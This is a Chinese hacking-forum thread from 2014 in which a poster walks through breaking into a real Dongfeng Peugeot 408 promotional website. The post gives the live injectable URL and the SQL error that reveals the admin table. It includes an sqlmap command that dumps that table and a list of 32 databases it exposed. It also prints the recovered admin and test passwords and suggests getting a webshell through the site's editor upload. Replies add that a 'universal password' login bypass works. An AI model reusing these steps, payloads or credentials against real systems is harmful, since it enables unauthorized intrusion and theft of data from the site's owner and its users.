查看: 17038|回复: 9

东风标致408打入后台可脱裤

[复制链接]
  • TA的每日心情
    奋斗
    2021-12-29 18:17
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2014-7-29 18:51:52 | 显示全部楼层 |阅读模式
    #01 注入 还是原洞主的注入点可以用 <code>http://408.peugeot.com.cn/show.php?cid=57</code> 注入点可以直接用,但如果提交这个不就重复了吗?我们要的是别的思路
    #02盲注 我们登录后台(怎么找到的?当然是猜的) 看到一个比较格录的……(今天看pkav的教程时候想到了后台注入) 然后试一下 admin' admin 结果就报错了……很遗憾没有物理路径,要不然配合原洞主的注入就可以sqlmap写shell了。 后台注入到此为止吧……我也不太擅长手工,但是从这里我们发现了一些信息
    <code>Database error: Invalid SQL: SELECT id FROM `p_admin` WHERE username = 'admin'' AND password = 'admin' AND stat = 1 MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' AND stat = 1' at line 1) Session halted.</code>
    数据库类型mysql
    密码表名 p_admin
    用户名字段:username
    密码字段:password
    物理路径还是无法获得。
    #03 脱裤 sqlmap不解释……估计前洞主没有列数据库,要不然会发现整个主站都是在同一个mysql里 一共32个库,可以脱裤
    <code>available databases [32]:
    [*] 2014happy
    [*] 24hours
    [*] 3015db
    [*] 308
    [*] 308powertogo
    [*] 50db
    [*] biaozhidashisai
    [*] happy3008 [*] hei3008 [*] hobby [*] information_schema [*] lemans [*] mysql [*] performance_schema [*] peugeot301 [*] peugeot408 [*] peugeot_2008_m [*] peugeot_3008 [*] peugeot_3008_1year [*] peugeot_3008_1year_m [*] peugeot_3008_3D [*] peugeot_3008_happy [*] peugeot_408_jy [*] peugeot_408im [*] peugeot_club_35group_2 [*] peugeot_cn [*] puzzlegame [*] rcz [*] sport [*] team [*] test [*] zhengyan
    </code>
    我们根据经验判断是peugeot408这个表,然后表段和字段我们在第二部里都知道了,就直接构造语句 <code> # Sqlmap -u http://408.peugeot.com.cn/show.php?cid=57 -D peogeot40 8 -T p_admin -C username,password --dump </code> 我们发现竟然是弱口令…… admin 408408 test test 继续成功登陆后台
    #04 猜想 后台存在kindeditor编辑器,可直接上传,审查元素获得webshell
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-24 14:55
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2014-7-29 21:08:35 | 显示全部楼层
    pkav的教程求分享,谢谢

    点评

    http://drops.wooyun.org/tips/2671  详情 回复 发表于 2014-7-30 09:10
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2018-12-13 14:00
  • 签到天数: 26 天

    [LV.4]偶尔看看III

    发表于 2014-7-30 09:10:38 | 显示全部楼层
    2863482451 发表于 2014-7-29 21:08
    pkav的教程求分享,谢谢

    http://drops.wooyun.org/tips/2671

    点评

    谢谢!  详情 回复 发表于 2014-7-30 18:29
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-7-30 11:41:49 | 显示全部楼层
    太牛了……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-7-30 16:26:31 | 显示全部楼层
    试了下,万能密码可进后台
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-7-10 07:02
  • 签到天数: 49 天

    [LV.5]常住居民I

    发表于 2014-7-30 16:50:29 | 显示全部楼层
    谢谢分享~               
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-16 17:33
  • 签到天数: 286 天

    [LV.8]以坛为家I

    发表于 2014-7-30 17:33:59 | 显示全部楼层
    来看看什么注入
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-24 14:55
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2014-7-30 18:29:59 | 显示全部楼层
    testKai 发表于 2014-7-30 09:10
    http://drops.wooyun.org/tips/2671

    谢谢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2014-7-30 20:41:49 | 显示全部楼层
    这个比较的屌
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-7-31 16:00:41 | 显示全部楼层
    无意的注入还挺搞笑的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 20:19 , Processed in 0.030870 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部